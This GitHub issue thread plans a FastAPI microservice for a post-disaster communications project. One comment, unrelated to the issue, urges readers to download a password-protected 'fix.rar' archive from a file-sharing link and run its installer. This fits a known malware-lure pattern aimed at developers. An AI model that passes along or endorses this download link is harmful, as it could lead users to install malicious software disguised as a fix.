### ISSUE TITLE
feat: setup fast-api microservice 

### ISSUE THREAD

**Issue by anujsinha3** [uw-ssec/post-disaster-comms#58]
- [ ] Configure API microservice using FastAPI
- [ ] Expose API endpoints
- [ ] Enable DB Interaction for APIs
- [ ] Setup open-API style documentation for endpoints (auto-enable with FastAPI)

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
